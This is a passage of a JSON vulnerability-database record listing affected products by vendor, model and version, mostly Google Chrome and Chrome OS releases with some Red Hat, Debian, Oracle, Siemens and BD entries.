        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.70"
      },
      {
        "model": "enterprise linux for power big endian extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.99"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.50"
      },
      {
        "model": "sql server for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "201420"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.491.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1054.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1017.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.535.1"
      },
      {
        "model": "enterprise linux server year extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-47.2"
      },
      {
        "model": "enterprise linux for scientific computing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1289.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.825.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.814.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.600.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.566.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.132"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.137"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "50.0.2661.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.877.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.860.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.475.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1070.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.958.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.1.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.94"
      },
      {
        "model": "simatic ipc847c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.415.1"
      },
      {
        "model": "enterprise linux eus compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.108"
      },
      {
        "model": "simatic itp1000",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "v23.01.03"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1020.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.614.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.57"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.344.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.34"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.235"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.156.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.111"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.715.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.55"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.505.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1063.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.286.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.723.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.105"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.134"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.725.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.224"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.672.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.358.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.151"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.754.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.107"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1007"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1659.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.783.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1047"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1052"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.78"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.51"
      },
      {
        "model": "simatic ipc277e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1690.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.308"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.820.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1044.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.109"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.343"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.432.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.731.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.249.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.560.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.819.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.324.0"
      },
      {
        "model": "enterprise linux for power big endian extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1048"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.125"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1032.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.162"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.433.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.117"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.201"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.612.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "38.0.2125.122"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.153"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.4.154.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.201"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1687.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.22"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.903.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.672.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.733.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.749.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.113"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.762.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.719.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.271.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.813.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.7"
      },
      {
        "model": "assurity linc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.237"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.36"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.53"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.211"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.622.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.673.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.106"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.1"
      },
      {
        "model": "accuri c6 plus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "simatic ipc477c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1063.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.187"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1055.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.383.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.790.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.465.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.319"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.658.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "51.0.2704.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1668.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.932.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.13"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.34"
      },
      {
        "model": "pyxis infant care verification",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.41"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "49.0.2623.108"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1064.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.686.0"
      },
